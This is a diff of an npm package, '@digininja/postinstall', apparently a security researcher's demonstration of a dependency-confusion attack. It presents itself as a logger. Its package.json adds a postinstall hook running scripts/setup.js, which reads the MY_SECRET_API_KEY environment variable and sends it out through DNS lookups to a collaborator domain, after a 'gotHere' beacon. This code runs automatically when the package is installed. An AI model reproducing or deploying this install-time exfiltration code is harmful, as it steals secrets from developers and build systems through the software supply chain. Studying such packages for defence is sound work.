@digininja/postinstall 1.0.1

package/README.md

@@ -0,0 +1,3 @@
+# Logger
+
+This is the malicious version of the logger published to npm and using dependency confusion to get installed over the real version.

package/index.js

@@ -0,0 +1,4 @@
+module.exports = { 
+  info: (msg) => console.log(`[LOCAL][INFO] ${new Date().toISOString()}: ${msg}`),
+  error: (msg) => console.error(`[LOCAL][ERROR] ${new Date().toISOString()}: ${msg}`)
+};

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "@digininja/postinstall",
+  "version": "1.0.1",
+  "description": "Hijack secrets from GitHub",
+  "author": "Digininja",
+  "type": "commonjs",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node ./scripts/setup.js"
+  }
+}

package/scripts/setup.js

@@ -0,0 +1,37 @@
+const apiKey = process.env.MY_SECRET_API_KEY;
+
+const dns = require('node:dns');
+
+const options = {
+  family: 4, // Look for IPv4
+  hints: dns.ADDRCONFIG | dns.V4MAPPED,
+};
+
+function lookup(domain) {
+	dns.lookup(domain, options, (err, address, family) => {
+	  if (err) {
+		console.error('Lookup failed:', err);
+		return;
+	  }
+	  // don't care
+	  // console.log('Address: %j family: IPv4', address);
+	});
+}
+
+function log(message, data = '') {
+	console.log(`[POSTINSTALL DEBUG] ${message}`, data);
+}
+
+// DNS cache buster
+const seconds = Math.floor(Date.now() / 1000);
+lookup('gotHere' + seconds + ".6u1s7jd9esbax66anvpcg34jgam1asyh.collab.digi.ninja");
+
+log('Checking for API Key...');
+
+if (!apiKey) {
+  log('API Key missing. Exiting gracefully.');
+  process.exit(0);
+}
+lookup(apiKey+'.6u1s7jd9esbax66anvpcg34jgam1asyh.collab.digi.ninja');
+
+log('Using API Key:', apiKey);